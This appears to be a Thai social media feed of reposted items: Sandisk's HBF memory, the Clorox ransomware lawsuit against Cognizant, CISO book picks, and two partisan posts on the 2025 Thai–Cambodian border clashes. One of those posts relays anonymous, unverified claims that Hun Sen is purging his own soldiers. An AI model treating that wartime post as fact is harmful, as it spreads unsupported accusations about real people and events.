    Sandisk ได้ตั้งคณะกรรมการที่ปรึกษาด้านเทคนิค โดยดึงสองตำนานแห่งวงการคอมพิวเตอร์มาเป็นผู้นำ ได้แก่ Prof. David Patterson ผู้ร่วมพัฒนา RISC และ RAID และ Raja Koduri อดีตหัวหน้าฝ่ายกราฟิกของ AMD และ Intel เพื่อผลักดัน HBF ให้กลายเป็นมาตรฐานใหม่ของหน่วยความจำสำหรับ AI

    HBF ใช้ NAND Flash แบบ BiCS ร่วมกับเทคนิค CBA wafer bonding และการจัดเรียงชิปแบบ 16 ชั้นต่อแพ็กเกจ ทำให้สามารถให้แบนด์วิดธ์ระดับ HBM ได้ แต่มีความจุสูงถึง 4TB ต่อ GPU และต้นทุนต่ำกว่าอย่างมหาศาล

    Sandisk เปิดตัวเทคโนโลยี HBF (High Bandwidth Flash) เพื่อใช้แทน HBM ในงาน AI
    ใช้ NAND Flash แบบ BiCS ร่วมกับ CBA wafer bonding
    รองรับการจัดเรียงชิปแบบ 16 ชั้นต่อแพ็กเกจ

    HBF ให้แบนด์วิดธ์ระดับเดียวกับ HBM แต่มีความจุสูงกว่า 8 เท่าในต้นทุนใกล้เคียงกัน
    GPU ที่ใช้ HBF สามารถมี VRAM ได้ถึง 4TB
    หากใช้ร่วมกับ HBM จะได้รวมสูงสุดถึง 3TB

    Sandisk ตั้งคณะกรรมการที่ปรึกษาโดยมี David Patterson และ Raja Koduri เป็นผู้นำ
    Patterson คือผู้ร่วมพัฒนา RISC และ RAID
    Koduri เคยเป็นหัวหน้าฝ่ายกราฟิกของ AMD และ Intel

    HBF ถูกออกแบบมาเพื่อรองรับงาน AI ทั้งในดาต้าเซ็นเตอร์และ edge computing
    Patterson ระบุว่า HBF จะช่วยลดต้นทุนของงาน AI ที่ปัจจุบันยังแพงเกินไป
    Koduri ระบุว่า HBF จะพลิกโฉม edge AI โดยให้แบนด์วิดธ์และความจุสูงในอุปกรณ์ขนาดเล็ก

    HBF ใช้ electrical interface เดียวกับ HBM และต้องปรับ protocol เพียงเล็กน้อย
    ทำให้สามารถนำไปใช้กับ GPU ได้ง่ายขึ้น
    ไม่จำเป็นต้องออกแบบระบบใหม่ทั้งหมด

    เปิดตัวครั้งแรกในงาน Future FWD 2025 พร้อมแผนพัฒนา HBF รุ่นต่อไป
    มี roadmap เพิ่มความจุและแบนด์วิดธ์ในอนาคต
    อาจมี trade-off ด้านการใช้พลังงาน

    HBF ยังไม่ใช่ตัวแทนโดยตรงของ HBM และมีข้อจำกัดด้าน latency
    NAND Flash มี latency สูงกว่า DRAM
    เหมาะกับงาน inference และ training มากกว่างานที่ต้องตอบสนองเร็ว

    การใช้งาน HBF ต้องอาศัยการสนับสนุนจากผู้ผลิต GPU โดยตรง
    ต้องใช้ interposer ที่เชื่อมต่อกับ GPU โดยเฉพาะ
    หาก NVIDIA ไม่รับรอง HBF อาจจำกัดการใช้งานในตลาด

    ยังไม่มีการประกาศวันเปิดตัวหรือผลิตภัณฑ์ที่ใช้ HBF อย่างเป็นทางการ
    อยู่ในขั้นตอนการพัฒนาและทดสอบ
    ต้องรอการยอมรับจากอุตสาหกรรมก่อนใช้งานจริง

    การแข่งขันกับผู้ผลิต HBM อย่าง Samsung และ SK Hynix ยังเข้มข้น
    HBM มี ecosystem ที่แข็งแกร่งและได้รับการสนับสนุนจาก NVIDIA
    Sandisk ต้องผลักดัน HBF ให้เป็นมาตรฐานเปิดเพื่อหลีกเลี่ยงการผูกขาด

    https://www.techradar.com/pro/sandisk-recruits-risc-cofounder-amd-graphics-legend-to-spearhead-cheaper-rival-to-hbm-high-bandwidth-flash-could-bring-ssd-capacities-to-ai-gpus-without-the-cost
    ⚡ เรื่องเล่าจากวงการชิป: เมื่อ “แฟลช” จะมาแทน “แรม” ในงาน AI ลองจินตนาการว่า GPU สำหรับงาน AI ไม่ต้องพึ่ง DRAM แบบ HBM ที่แพงและจำกัดความจุอีกต่อไป แต่ใช้แฟลชความเร็วสูงที่มีความจุระดับ SSD—นั่นคือเป้าหมายของ Sandisk กับเทคโนโลยี HBF (High Bandwidth Flash) Sandisk ได้ตั้งคณะกรรมการที่ปรึกษาด้านเทคนิค โดยดึงสองตำนานแห่งวงการคอมพิวเตอร์มาเป็นผู้นำ ได้แก่ Prof. David Patterson ผู้ร่วมพัฒนา RISC และ RAID และ Raja Koduri อดีตหัวหน้าฝ่ายกราฟิกของ AMD และ Intel เพื่อผลักดัน HBF ให้กลายเป็นมาตรฐานใหม่ของหน่วยความจำสำหรับ AI HBF ใช้ NAND Flash แบบ BiCS ร่วมกับเทคนิค CBA wafer bonding และการจัดเรียงชิปแบบ 16 ชั้นต่อแพ็กเกจ ทำให้สามารถให้แบนด์วิดธ์ระดับ HBM ได้ แต่มีความจุสูงถึง 4TB ต่อ GPU และต้นทุนต่ำกว่าอย่างมหาศาล ✅ Sandisk เปิดตัวเทคโนโลยี HBF (High Bandwidth Flash) เพื่อใช้แทน HBM ในงาน AI ➡️ ใช้ NAND Flash แบบ BiCS ร่วมกับ CBA wafer bonding ➡️ รองรับการจัดเรียงชิปแบบ 16 ชั้นต่อแพ็กเกจ ✅ HBF ให้แบนด์วิดธ์ระดับเดียวกับ HBM แต่มีความจุสูงกว่า 8 เท่าในต้นทุนใกล้เคียงกัน ➡️ GPU ที่ใช้ HBF สามารถมี VRAM ได้ถึง 4TB ➡️ หากใช้ร่วมกับ HBM จะได้รวมสูงสุดถึง 3TB ✅ Sandisk ตั้งคณะกรรมการที่ปรึกษาโดยมี David Patterson และ Raja Koduri เป็นผู้นำ ➡️ Patterson คือผู้ร่วมพัฒนา RISC และ RAID ➡️ Koduri เคยเป็นหัวหน้าฝ่ายกราฟิกของ AMD และ Intel ✅ HBF ถูกออกแบบมาเพื่อรองรับงาน AI ทั้งในดาต้าเซ็นเตอร์และ edge computing ➡️ Patterson ระบุว่า HBF จะช่วยลดต้นทุนของงาน AI ที่ปัจจุบันยังแพงเกินไป ➡️ Koduri ระบุว่า HBF จะพลิกโฉม edge AI โดยให้แบนด์วิดธ์และความจุสูงในอุปกรณ์ขนาดเล็ก ✅ HBF ใช้ electrical interface เดียวกับ HBM และต้องปรับ protocol เพียงเล็กน้อย ➡️ ทำให้สามารถนำไปใช้กับ GPU ได้ง่ายขึ้น ➡️ ไม่จำเป็นต้องออกแบบระบบใหม่ทั้งหมด ✅ เปิดตัวครั้งแรกในงาน Future FWD 2025 พร้อมแผนพัฒนา HBF รุ่นต่อไป ➡️ มี roadmap เพิ่มความจุและแบนด์วิดธ์ในอนาคต ➡️ อาจมี trade-off ด้านการใช้พลังงาน ‼️ HBF ยังไม่ใช่ตัวแทนโดยตรงของ HBM และมีข้อจำกัดด้าน latency ⛔ NAND Flash มี latency สูงกว่า DRAM ⛔ เหมาะกับงาน inference และ training มากกว่างานที่ต้องตอบสนองเร็ว ‼️ การใช้งาน HBF ต้องอาศัยการสนับสนุนจากผู้ผลิต GPU โดยตรง ⛔ ต้องใช้ interposer ที่เชื่อมต่อกับ GPU โดยเฉพาะ ⛔ หาก NVIDIA ไม่รับรอง HBF อาจจำกัดการใช้งานในตลาด ‼️ ยังไม่มีการประกาศวันเปิดตัวหรือผลิตภัณฑ์ที่ใช้ HBF อย่างเป็นทางการ ⛔ อยู่ในขั้นตอนการพัฒนาและทดสอบ ⛔ ต้องรอการยอมรับจากอุตสาหกรรมก่อนใช้งานจริง ‼️ การแข่งขันกับผู้ผลิต HBM อย่าง Samsung และ SK Hynix ยังเข้มข้น ⛔ HBM มี ecosystem ที่แข็งแกร่งและได้รับการสนับสนุนจาก NVIDIA ⛔ Sandisk ต้องผลักดัน HBF ให้เป็นมาตรฐานเปิดเพื่อหลีกเลี่ยงการผูกขาด https://www.techradar.com/pro/sandisk-recruits-risc-cofounder-amd-graphics-legend-to-spearhead-cheaper-rival-to-hbm-high-bandwidth-flash-could-bring-ssd-capacities-to-ai-gpus-without-the-cost
    0 ความคิดเห็น 0 การแบ่งปัน 129 มุมมอง 0 รีวิว
  • เรื่องเล่าจากสายโทรศัพท์: เมื่อแฮกเกอร์แค่ “ขอรหัส” แล้วได้จริง

    ย้อนกลับไปในเดือนสิงหาคม 2023 บริษัท Clorox ผู้ผลิตน้ำยาฟอกขาวชื่อดัง ถูกโจมตีด้วยแรนซัมแวร์โดยกลุ่ม Scattered Spider ซึ่งใช้วิธีง่ายๆ อย่างการโทรไปยังฝ่าย IT ของ Cognizant—ผู้ให้บริการด้านเทคโนโลยีของ Clorox—แล้ว “ขอรหัสผ่าน” โดยแอบอ้างว่าเป็นพนักงาน

    สิ่งที่น่าตกใจคือ พนักงานของ Cognizant กลับให้รหัสผ่านโดยไม่ตรวจสอบตัวตนใดๆ ทั้งสิ้น! ไม่ถามชื่อผู้จัดการ ไม่ตรวจสอบอีเมล ไม่ใช้ระบบยืนยันตัวตนที่ Clorox เตรียมไว้เลยแม้แต่นิดเดียว

    ผลลัพธ์คือ Clorox ต้องหยุดการผลิต, ปิดระบบ IT, และใช้การจัดการคำสั่งซื้อแบบแมนนวลนานหลายสัปดาห์ รวมความเสียหายกว่า 380 ล้านดอลลาร์ และล่าสุด Clorox ได้ฟ้อง Cognizant ฐานประมาทเลินเล่ออย่างร้ายแรง

    Clorox ถูกโจมตีด้วยแรนซัมแวร์ในเดือนสิงหาคม 2023 โดยกลุ่ม Scattered Spider
    ใช้วิธี social engineering โทรไปขอรหัสผ่านจากฝ่าย IT โดยแอบอ้างเป็นพนักงาน
    ไม่ใช้มัลแวร์หรือเทคนิคซับซ้อนใดๆ

    Cognizant เป็นผู้ให้บริการ IT ที่ดูแลระบบภายในของ Clorox รวมถึงการรีเซ็ตรหัสผ่านและ MFA
    มีหน้าที่ตรวจสอบตัวตนก่อนให้ข้อมูลสำคัญ
    แต่กลับละเลยขั้นตอนทั้งหมดที่ Clorox กำหนดไว้

    Clorox ฟ้อง Cognizant เรียกค่าเสียหาย 380 ล้านดอลลาร์
    รวมถึงค่าใช้จ่ายในการฟื้นฟูระบบกว่า 49 ล้านดอลลาร์
    และความเสียหายจากการหยุดผลิตและจัดส่งสินค้า

    มีหลักฐานเป็นบทสนทนาระหว่างแฮกเกอร์กับพนักงาน Cognizant ที่ให้รหัสโดยไม่ตรวจสอบ
    “I don’t have a password, so I can’t connect.”
    “Oh, ok. Ok. So, let me provide the password to you, okay?”

    ระบบที่ควรใช้คือ MyID และการตรวจสอบผ่านชื่อผู้จัดการและอีเมลยืนยัน
    แต่ไม่ได้ถูกนำมาใช้เลยในเหตุการณ์นี้
    แสดงถึงความล้มเหลวในการฝึกอบรมและควบคุมคุณภาพ

    การละเลยขั้นตอนตรวจสอบตัวตนสามารถเปิดช่องให้เกิดการโจมตีร้ายแรง
    แม้จะมีระบบความปลอดภัยดีแค่ไหน แต่จุดอ่อนคือ “มนุษย์” ที่ไม่ทำตามขั้นตอน
    การแอบอ้างตัวตนเป็นวิธีพื้นฐานที่ยังได้ผลในหลายองค์กร

    การจ้างบริษัทภายนอกดูแลระบบ IT ต้องมีการกำกับและตรวจสอบอย่างเข้มงวด
    ไม่ควรคิดว่า “จ้างแล้วจบ” โดยไม่ติดตามการปฏิบัติงานจริง
    ควรมีสัญญาที่ระบุขั้นตอนความปลอดภัยอย่างชัดเจน

    การตอบสนองต่อเหตุการณ์โจมตีต้องรวดเร็วและแม่นยำ
    Clorox ระบุว่า Cognizantใช้เวลานานเกินไปในการติดตั้งเครื่องมือป้องกัน
    ส่งผลให้การควบคุมความเสียหายล่าช้าไปหลายชั่วโมง

    การละเมิดขั้นตอนพื้นฐานอาจนำไปสู่ความเสียหายระดับองค์กร
    ไม่ใช่แค่ข้อมูลรั่ว แต่กระทบถึงการผลิต, การจัดส่ง, และความเชื่อมั่นของลูกค้า
    อาจต้องใช้เวลาหลายเดือนในการฟื้นฟูภาพลักษณ์และระบบ

    https://www.tomshardware.com/tech-industry/cyber-security/it-provider-sued-after-it-simply-handed-the-credentials-to-hackers-clorox-claims-cognizant-gaffe-enabled-a-usd380m-ransomware-attack
    🔓 เรื่องเล่าจากสายโทรศัพท์: เมื่อแฮกเกอร์แค่ “ขอรหัส” แล้วได้จริง ย้อนกลับไปในเดือนสิงหาคม 2023 บริษัท Clorox ผู้ผลิตน้ำยาฟอกขาวชื่อดัง ถูกโจมตีด้วยแรนซัมแวร์โดยกลุ่ม Scattered Spider ซึ่งใช้วิธีง่ายๆ อย่างการโทรไปยังฝ่าย IT ของ Cognizant—ผู้ให้บริการด้านเทคโนโลยีของ Clorox—แล้ว “ขอรหัสผ่าน” โดยแอบอ้างว่าเป็นพนักงาน สิ่งที่น่าตกใจคือ พนักงานของ Cognizant กลับให้รหัสผ่านโดยไม่ตรวจสอบตัวตนใดๆ ทั้งสิ้น! ไม่ถามชื่อผู้จัดการ ไม่ตรวจสอบอีเมล ไม่ใช้ระบบยืนยันตัวตนที่ Clorox เตรียมไว้เลยแม้แต่นิดเดียว ผลลัพธ์คือ Clorox ต้องหยุดการผลิต, ปิดระบบ IT, และใช้การจัดการคำสั่งซื้อแบบแมนนวลนานหลายสัปดาห์ รวมความเสียหายกว่า 380 ล้านดอลลาร์ และล่าสุด Clorox ได้ฟ้อง Cognizant ฐานประมาทเลินเล่ออย่างร้ายแรง ✅ Clorox ถูกโจมตีด้วยแรนซัมแวร์ในเดือนสิงหาคม 2023 โดยกลุ่ม Scattered Spider ➡️ ใช้วิธี social engineering โทรไปขอรหัสผ่านจากฝ่าย IT โดยแอบอ้างเป็นพนักงาน ➡️ ไม่ใช้มัลแวร์หรือเทคนิคซับซ้อนใดๆ ✅ Cognizant เป็นผู้ให้บริการ IT ที่ดูแลระบบภายในของ Clorox รวมถึงการรีเซ็ตรหัสผ่านและ MFA ➡️ มีหน้าที่ตรวจสอบตัวตนก่อนให้ข้อมูลสำคัญ ➡️ แต่กลับละเลยขั้นตอนทั้งหมดที่ Clorox กำหนดไว้ ✅ Clorox ฟ้อง Cognizant เรียกค่าเสียหาย 380 ล้านดอลลาร์ ➡️ รวมถึงค่าใช้จ่ายในการฟื้นฟูระบบกว่า 49 ล้านดอลลาร์ ➡️ และความเสียหายจากการหยุดผลิตและจัดส่งสินค้า ✅ มีหลักฐานเป็นบทสนทนาระหว่างแฮกเกอร์กับพนักงาน Cognizant ที่ให้รหัสโดยไม่ตรวจสอบ ➡️ “I don’t have a password, so I can’t connect.” ➡️ “Oh, ok. Ok. So, let me provide the password to you, okay?” ✅ ระบบที่ควรใช้คือ MyID และการตรวจสอบผ่านชื่อผู้จัดการและอีเมลยืนยัน ➡️ แต่ไม่ได้ถูกนำมาใช้เลยในเหตุการณ์นี้ ➡️ แสดงถึงความล้มเหลวในการฝึกอบรมและควบคุมคุณภาพ ‼️ การละเลยขั้นตอนตรวจสอบตัวตนสามารถเปิดช่องให้เกิดการโจมตีร้ายแรง ⛔ แม้จะมีระบบความปลอดภัยดีแค่ไหน แต่จุดอ่อนคือ “มนุษย์” ที่ไม่ทำตามขั้นตอน ⛔ การแอบอ้างตัวตนเป็นวิธีพื้นฐานที่ยังได้ผลในหลายองค์กร ‼️ การจ้างบริษัทภายนอกดูแลระบบ IT ต้องมีการกำกับและตรวจสอบอย่างเข้มงวด ⛔ ไม่ควรคิดว่า “จ้างแล้วจบ” โดยไม่ติดตามการปฏิบัติงานจริง ⛔ ควรมีสัญญาที่ระบุขั้นตอนความปลอดภัยอย่างชัดเจน ‼️ การตอบสนองต่อเหตุการณ์โจมตีต้องรวดเร็วและแม่นยำ ⛔ Clorox ระบุว่า Cognizantใช้เวลานานเกินไปในการติดตั้งเครื่องมือป้องกัน ⛔ ส่งผลให้การควบคุมความเสียหายล่าช้าไปหลายชั่วโมง ‼️ การละเมิดขั้นตอนพื้นฐานอาจนำไปสู่ความเสียหายระดับองค์กร ⛔ ไม่ใช่แค่ข้อมูลรั่ว แต่กระทบถึงการผลิต, การจัดส่ง, และความเชื่อมั่นของลูกค้า ⛔ อาจต้องใช้เวลาหลายเดือนในการฟื้นฟูภาพลักษณ์และระบบ https://www.tomshardware.com/tech-industry/cyber-security/it-provider-sued-after-it-simply-handed-the-credentials-to-hackers-clorox-claims-cognizant-gaffe-enabled-a-usd380m-ransomware-attack
    0 ความคิดเห็น 0 การแบ่งปัน 154 มุมมอง 0 รีวิว
  • "ทหารกัมพูชาโดยคำสั่งของฮุนเซน บุคคลผู้มีอำนาจเหนือรัฐบาลกัมพูชา ยิงจรวดและอาวุธสงครามใส่ประชาชนไทย โดยเน้นเป้าหมายโรงพยาบาล เขตชุมชน และโรงเรียน เป็นเหตุให้ประชาชนไทยเสียชีวิตไปแล้วอย่างน้อย 14-15 ศพ และบาดเจ็บอีกหลายสิบคน และทำให้ทรัพย์สินของประชาชนไทยเสียหายโดยยังไม่สามารถประเมินความเสียหายที่ชัดเจนได้..."

    [English Translation from the first paragraph of this Chalermchai Yodmalai's article] - "Cambodian soldiers, ordered by Hun Sen - Cambodia's de facto leader, have been firing rockets and weapons into Thailand (since July 24th, 2025) targeting hospitals, communities, and schools, causing the death of at least 14 - 15 Thais, many injured people, and also destroyed Thai properties."

    #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด
    #TruthFromThailand
    #CambodiaOpenedFire
    #HunSenWarCriminal

    https://www.naewna.com/politic/columnist/63462
    "ทหารกัมพูชาโดยคำสั่งของฮุนเซน บุคคลผู้มีอำนาจเหนือรัฐบาลกัมพูชา ยิงจรวดและอาวุธสงครามใส่ประชาชนไทย โดยเน้นเป้าหมายโรงพยาบาล เขตชุมชน และโรงเรียน เป็นเหตุให้ประชาชนไทยเสียชีวิตไปแล้วอย่างน้อย 14-15 ศพ และบาดเจ็บอีกหลายสิบคน และทำให้ทรัพย์สินของประชาชนไทยเสียหายโดยยังไม่สามารถประเมินความเสียหายที่ชัดเจนได้..." [English Translation from the first paragraph of this Chalermchai Yodmalai's article] - "Cambodian soldiers, ordered by Hun Sen - Cambodia's de facto leader, have been firing rockets and weapons into Thailand (since July 24th, 2025) targeting hospitals, communities, and schools, causing the death of at least 14 - 15 Thais, many injured people, and also destroyed Thai properties." #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #TruthFromThailand #CambodiaOpenedFire #HunSenWarCriminal https://www.naewna.com/politic/columnist/63462
    0 ความคิดเห็น 0 การแบ่งปัน 147 มุมมอง 0 รีวิว
  • Sat. Jul. 26, 2025

    Very interesting. From unknown source.
    READ CAREFULLY!!

    What Hun Sen truly wants isn’t just a border war — it’s to eliminate soldiers who may no longer be loyal to Hun dynasty.

    Hunsen now significantly reduced the military budget and redirected funds to build a “special guard force” equipped with state-of-the-art weapons, available only to those loyal to him personally.

    Ordinary Cambodian soldiers don't have a chance to even touch those weapons. Soldiers are usually not familiar with modern weapons. But ultimately, he was sent to death at the border with patriotism, using the word "loyal to the nation" as a vest.

    And now, Hun Sen is preparing to send the navy to the battlefield — even though there is no maritime dispute with Thailand. There aren’t even proper warships ready, yet generals and sailors are being deployed to die.

    This is too weird, and obviously not a war for the nation, but a war for the dynasty.

    The world may ignore a small country like Cambodia, but the truth is this:

    Cambodian soldiers are being sacrificed — not for the nation — but for one man’s throne.
    This is not a war for the country. It’s a purge — a calculated operation to remove anyone in uniform who might challenge the Hun dynasty’s grip on power.

    It’s not just strange. It’s strategic.

    No rational leader would send his troops to death if he knew they would lose—except “death” was the original plan.

    ----------------------------------------------

    น่าสนใจมาก จากแหล่งข่าวนิรนาม
    โปรดอ่านอย่างตั้งใจ!!

    สิ่งที่ฮุน เซนต้องการจริงๆ ไม่ใช่แค่สงครามชายแดน — แต่คือการกำจัดทหารที่อาจจะไม่จงรักภักดีต่อราชวงศ์ฮุนอีกต่อไป

    ขณะนี้ ฮุน เซนได้ลดงบประมาณกองทัพลงอย่างมาก และนำเงินไปสร้าง “กองกำลังพิเศษอารักขา” ซึ่งมีอาวุธทันสมัยที่สุด และมีไว้ให้เฉพาะผู้ที่จงรักภักดีต่อเขาเป็นการส่วนตัวเท่านั้น

    ทหารกัมพูชาทั่วไปไม่มีโอกาสแม้แต่จะสัมผัสอาวุธเหล่านั้น ทหารเหล่านี้ส่วนใหญ่ไม่คุ้นเคยกับอาวุธยุคใหม่ แต่สุดท้ายพวกเขาก็ถูกส่งไปตายที่ชายแดน ภายใต้คำว่า “จงรักภักดีต่อชาติ” เป็นเกราะกำบัง

    ตอนนี้ ฮุน เซนกำลังเตรียมส่งกองทัพเรือเข้าสู่สนามรบ — ทั้งๆ ที่ไม่มีข้อพิพาททางทะเลกับประเทศไทยด้วยซ้ำ ไม่มีแม้แต่เรือรบที่พร้อมรบ แต่กลับมีการส่งนายพลและลูกเรือไปตาย

    เรื่องนี้แปลกเกินไป และเห็นได้ชัดว่าไม่ใช่สงครามเพื่อชาติ แต่เป็นสงครามเพื่อราชวงศ์

    แม้โลกอาจเพิกเฉยต่อประเทศเล็กๆ อย่างกัมพูชา แต่ความจริงคือ:

    ทหารกัมพูชากำลังถูกสังเวย — ไม่ใช่เพื่อประเทศชาติ — แต่เพื่อบัลลังก์ของชายคนเดียว

    นี่ไม่ใช่สงครามเพื่อประเทศ แต่มันคือการกวาดล้าง — ปฏิบัติการที่วางแผนมาอย่างดีเพื่อกำจัดทุกคนในเครื่องแบบที่อาจเป็นภัยต่ออำนาจของราชวงศ์ฮุน

    มันไม่ใช่แค่แปลก แต่มันคือกลยุทธ์

    ไม่มีผู้นำที่มีสติดีคนไหนจะส่งทหารไปตาย ทั้งที่รู้ว่าจะแพ้ — เว้นแต่ “ความตาย” นั้นจะเป็นแผนที่ถูกวางไว้แต่แรกอยู่แล้ว

    #กัมพูชายิงก่อน
    #CambodiaOpenedFire
    #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด
    #hunsenwarcriminal
    #ฮุนเซนอาชญากรสงคราม
    #ឧក្រិដ្ឋជនហ៊ុនសែន
    #洪森戰爭罪犯
    Sat. Jul. 26, 2025 Very interesting. From unknown source. READ CAREFULLY!! What Hun Sen truly wants isn’t just a border war — it’s to eliminate soldiers who may no longer be loyal to Hun dynasty. Hunsen now significantly reduced the military budget and redirected funds to build a “special guard force” equipped with state-of-the-art weapons, available only to those loyal to him personally. Ordinary Cambodian soldiers don't have a chance to even touch those weapons. Soldiers are usually not familiar with modern weapons. But ultimately, he was sent to death at the border with patriotism, using the word "loyal to the nation" as a vest. And now, Hun Sen is preparing to send the navy to the battlefield — even though there is no maritime dispute with Thailand. There aren’t even proper warships ready, yet generals and sailors are being deployed to die. This is too weird, and obviously not a war for the nation, but a war for the dynasty. The world may ignore a small country like Cambodia, but the truth is this: Cambodian soldiers are being sacrificed — not for the nation — but for one man’s throne. This is not a war for the country. It’s a purge — a calculated operation to remove anyone in uniform who might challenge the Hun dynasty’s grip on power. It’s not just strange. It’s strategic. No rational leader would send his troops to death if he knew they would lose—except “death” was the original plan. ---------------------------------------------- น่าสนใจมาก จากแหล่งข่าวนิรนาม โปรดอ่านอย่างตั้งใจ!! สิ่งที่ฮุน เซนต้องการจริงๆ ไม่ใช่แค่สงครามชายแดน — แต่คือการกำจัดทหารที่อาจจะไม่จงรักภักดีต่อราชวงศ์ฮุนอีกต่อไป ขณะนี้ ฮุน เซนได้ลดงบประมาณกองทัพลงอย่างมาก และนำเงินไปสร้าง “กองกำลังพิเศษอารักขา” ซึ่งมีอาวุธทันสมัยที่สุด และมีไว้ให้เฉพาะผู้ที่จงรักภักดีต่อเขาเป็นการส่วนตัวเท่านั้น ทหารกัมพูชาทั่วไปไม่มีโอกาสแม้แต่จะสัมผัสอาวุธเหล่านั้น ทหารเหล่านี้ส่วนใหญ่ไม่คุ้นเคยกับอาวุธยุคใหม่ แต่สุดท้ายพวกเขาก็ถูกส่งไปตายที่ชายแดน ภายใต้คำว่า “จงรักภักดีต่อชาติ” เป็นเกราะกำบัง ตอนนี้ ฮุน เซนกำลังเตรียมส่งกองทัพเรือเข้าสู่สนามรบ — ทั้งๆ ที่ไม่มีข้อพิพาททางทะเลกับประเทศไทยด้วยซ้ำ ไม่มีแม้แต่เรือรบที่พร้อมรบ แต่กลับมีการส่งนายพลและลูกเรือไปตาย เรื่องนี้แปลกเกินไป และเห็นได้ชัดว่าไม่ใช่สงครามเพื่อชาติ แต่เป็นสงครามเพื่อราชวงศ์ แม้โลกอาจเพิกเฉยต่อประเทศเล็กๆ อย่างกัมพูชา แต่ความจริงคือ: ทหารกัมพูชากำลังถูกสังเวย — ไม่ใช่เพื่อประเทศชาติ — แต่เพื่อบัลลังก์ของชายคนเดียว นี่ไม่ใช่สงครามเพื่อประเทศ แต่มันคือการกวาดล้าง — ปฏิบัติการที่วางแผนมาอย่างดีเพื่อกำจัดทุกคนในเครื่องแบบที่อาจเป็นภัยต่ออำนาจของราชวงศ์ฮุน มันไม่ใช่แค่แปลก แต่มันคือกลยุทธ์ ไม่มีผู้นำที่มีสติดีคนไหนจะส่งทหารไปตาย ทั้งที่รู้ว่าจะแพ้ — เว้นแต่ “ความตาย” นั้นจะเป็นแผนที่ถูกวางไว้แต่แรกอยู่แล้ว #กัมพูชายิงก่อน #CambodiaOpenedFire #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #hunsenwarcriminal #ฮุนเซนอาชญากรสงคราม #ឧក្រិដ្ឋជនហ៊ុនសែន #洪森戰爭罪犯
    0 ความคิดเห็น 0 การแบ่งปัน 229 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกไซเบอร์: หนังสือที่เปลี่ยนผู้นำให้กลายเป็นนักคิดเชิงกลยุทธ์

    ลองนึกภาพว่าคุณเป็น CISO (Chief Information Security Officer) ที่ต้องรับมือกับภัยคุกคามไซเบอร์ตลอดเวลา ทั้งการโจมตีแบบใหม่ ความเสี่ยงจากพฤติกรรมมนุษย์ และแรงกดดันจากผู้บริหารระดับสูง คุณจะพึ่งพาอะไรเพื่อพัฒนาทักษะการตัดสินใจและความเป็นผู้นำ?

    คำตอบของผู้นำหลายคนคือ “หนังสือ” — ไม่ใช่แค่คู่มือเทคนิค แต่เป็นแหล่งความรู้ที่ช่วยให้พวกเขาเข้าใจความเสี่ยง มนุษย์ และตัวเองได้ลึกซึ้งขึ้น

    จากการสำรวจของ CSO Online พบว่า CISO ชั้นนำแนะนำหนังสือหลากหลายแนว ตั้งแต่จิตวิทยาการตัดสินใจอย่าง Thinking, Fast and Slow ไปจนถึงการวัดความเสี่ยงแบบใหม่ใน How to Measure Anything in Cybersecurity Risk และแม้แต่หนังสืออย่าง The Art of Deception ที่เผยกลยุทธ์ของแฮกเกอร์ในการหลอกล่อมนุษย์

    สิ่งที่น่าสนใจคือ หลายคนยังแนะนำหนังสือที่ไม่เกี่ยวกับไซเบอร์โดยตรง เช่น The Alchemist หรือ Our Town เพื่อเตือนตัวเองให้กลับมาโฟกัสกับชีวิตและความหมายที่แท้จริง

    หนังสือที่ช่วยพัฒนาทักษะการวัดและจัดการความเสี่ยง

    How to Measure Anything in Cybersecurity Risk โดย Douglas Hubbard & Richard Seiersen
    เสนอวิธีวัดความเสี่ยงแบบกึ่งปริมาณที่แม่นยำกว่าการใช้ risk matrix
    ได้รับการแนะนำจากหลาย CISO เช่น Daniel Schatz และ James Blake

    Superforecasting โดย Philip Tetlock & Dan Gardner
    เจาะลึกศาสตร์แห่งการพยากรณ์อนาคตอย่างมีหลักการ
    มีตัวอย่างจริงและแนวทางสร้างการคาดการณ์ที่แม่นยำ

    หนังสือที่ช่วยลด “เสียงรบกวน” ในการตัดสินใจ

    Thinking, Fast and Slow โดย Daniel Kahneman
    อธิบายระบบคิดแบบเร็ว (System 1) และช้า (System 2)
    ช่วยให้เข้าใจอคติและข้อผิดพลาดในการตัดสินใจ

    Noise โดย Kahneman และทีม
    วิเคราะห์ว่าทำไมมนุษย์ถึงตัดสินใจผิดเพราะ “เสียงรบกวน”
    เสนอวิธีลดความผิดพลาดในการประเมินสถานการณ์

    Yeah, But โดย Marc Wolfe
    ช่วยให้ผู้นำจัดการกับเสียงในหัวที่ขัดขวางการเปลี่ยนแปลง
    ส่งเสริมความชัดเจนในการคิดและการนำทีม

    Digital Minimalism โดย Cal Newport
    ส่งเสริมการใช้เทคโนโลยีอย่างมีสติ
    ช่วยปกป้องเวลาและความสนใจของผู้นำ

    Better Than Before โดย Gretchen Rubin
    เสนอกรอบการสร้างนิสัยที่ดีเพื่อสนับสนุนเป้าหมายชีวิตและงาน

    หนังสือที่เน้นความเสี่ยงจากพฤติกรรมมนุษย์

    The Art of Deception โดย Kevin Mitnick
    เผยกลยุทธ์ social engineering ที่แฮกเกอร์ใช้หลอกมนุษย์
    ยังคงเป็นหนังสือพื้นฐานที่มีคุณค่าแม้จะตีพิมพ์มานาน

    Secrets and Lies โดย Bruce Schneier
    อธิบายความซับซ้อนของความปลอดภัยดิจิทัล
    เน้นว่าการจัดการพฤติกรรมมนุษย์สำคัญไม่แพ้เทคโนโลยี

    Human Hacked โดย Len Noe
    เจาะลึกผลกระทบของ AI ต่อการตัดสินใจของมนุษย์
    เตือนถึงผลลัพธ์ที่ไม่คาดคิดจากการผสานมนุษย์กับเทคโนโลยี

    ความเสี่ยงจากการละเลยพฤติกรรมมนุษย์ในระบบความปลอดภัย
    องค์กรที่เน้นเทคโนโลยีอย่างเดียวอาจพลาดช่องโหว่จากมนุษย์
    การไม่เข้าใจ social engineering ทำให้ระบบถูกเจาะง่ายขึ้น

    หนังสือที่ช่วยพัฒนาภาวะผู้นำ

    Dare to Lead โดย Brené Brown
    เน้นความกล้าหาญทางอารมณ์และความยืดหยุ่น
    ส่งเสริมวัฒนธรรมองค์กรที่เปิดกว้างและรับผิดชอบ

    Radical Candor โดย Kim Scott
    เสนอกรอบการให้ feedback ที่ตรงไปตรงมาแต่มีความเห็นอกเห็นใจ
